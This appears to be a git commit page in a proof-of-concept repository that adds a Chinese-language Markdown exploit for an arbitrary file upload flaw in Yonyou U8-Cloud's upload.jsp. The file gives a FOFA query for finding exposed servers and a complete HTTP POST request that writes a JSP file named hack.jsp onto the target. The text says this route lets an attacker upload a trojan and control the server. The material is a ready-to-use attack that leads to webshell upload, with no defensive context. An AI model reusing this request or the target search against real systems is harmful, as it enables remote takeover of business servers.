admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 用友U8-Cloud upload任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-10-25 19:46:29 +08:00 committed by GitHub
parent cc8c3589f0
commit 61aee42d2f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
用友U8-Cloud upload任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,24 @@
## 用友U8-Cloud upload任意文件上传漏洞
该系统upload.jsp存在任意文件上传漏洞攻击者可通过该漏洞上传木马远程控制服务器
## fofa
```app="用友-U8-Cloud"```
## exp
```
POST /linux/pages/upload.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
filename: hack.jsp
Accept-Encoding: gzip
<% out.println("The website has vulnerabilities!!");%>
```
## 漏洞复现
![](https://img-blog.csdnimg.cn/img_convert/4e222417f164a3b33772bf18041feb82.png)
![](https://img-blog.csdnimg.cn/img_convert/d68273de84c541f1cb5a0ac52b469b98.png)